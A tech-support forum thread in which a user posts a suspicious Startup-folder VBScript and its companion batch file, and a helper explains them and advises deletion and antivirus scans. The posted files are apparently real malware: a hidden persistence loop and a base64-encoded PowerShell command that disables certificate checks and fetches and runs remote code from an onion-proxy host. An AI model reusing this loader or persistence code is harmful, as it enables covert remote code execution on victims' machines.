Task Manager config app

GalaxY_2

Commendable
Aug 20, 2016
5
0
1,510
Hey there. Not so recently I realized I have an unknown app in Task Managers Startup tab, called config.. It doesn't have an icon and if I open the file location it locates a VB script file. Does anyone know whats this? I can post the script if it helps.
 

GalaxY_2

Commendable
Aug 20, 2016
5
0
1,510


C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup Thats the file location

I have it disabled cuz I dont know what that is.

Dim WinScriptHost
WScript.Sleep(30000)
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
While True
set service = GetObject ("winmgmts:")
running = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = "powershell.exe" then
running = running + 1
End If
next
If running < 1 then
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
End If
WScript.Sleep(120000)
Wend
Set WinScriptHost = Nothing

And this is the script itself.. Thats all I can find about it now
 
Are you able to open file.bat in the Line 4 pathname?

Wondering what that .bat file might be. I.e., the commands inside.....

Use Notepad to view.

Overall, the script is looking for and counting Powershell processes

Script seems to be built around the following link:

https://serverfault.com/questions/9038/run-a-bat-file-in-a-scheduled-task-without-a-window

See the script along side "139".

The script you found may be some "prank" or simulated virus, or just an exercise in general....

Just need to understand what file.bat is doing.....

Then unravel it all.




 

GalaxY_2

Commendable
Aug 20, 2016
5
0
1,510


well i didnt found any .bat files.. only folders with stuff that I have installed :| should I be worried about this config file? Should I delete it or what? I dont understand a thing about scripts and stuff..
 
If your system has not had any problems with the script being disabled then all should be well.

As for the missing .bat file: does anyone else use your computer and have their own user account? The .bat file may in one of their folders. Or the .bat could have already be deleted.

What to do:

Move the script to some "quarantine" folder of your own making. At some time in the future you will just delete the script. Very unlikely that the script is serving any real or beneficial purpose.

If something starts asking for the script file or reports it "missing" then post accordingly.

Be sure to include "what" is asking for or looking for the script.

 

GalaxY_2

Commendable
Aug 20, 2016
5
0
1,510


@echo off
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )


I dound this file.bat any idea whats this? :)
 
Going out of my comfort zone but will share my assessment.

Those lines with "START" are looking at your processor and then launching Powershell and apparently hiding the fact.

Reference the command line parameters listed in the following link:


https://docs.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help?view=powershell-6

As for all the rest..... some sort of code that Powershell is apparently expected to execute. Or some exploit or vulnerability due to Powershell running. What the code is actually to do - I cannot answer.

All-in-all do not see any legitimate use for the script file file.bat.

I would delete both and keep checking that they do not reappear. And run a few extra AV/malware scans as well.

Someone else following this thread may be able to offer additional insight and comment. No problem with that on my end.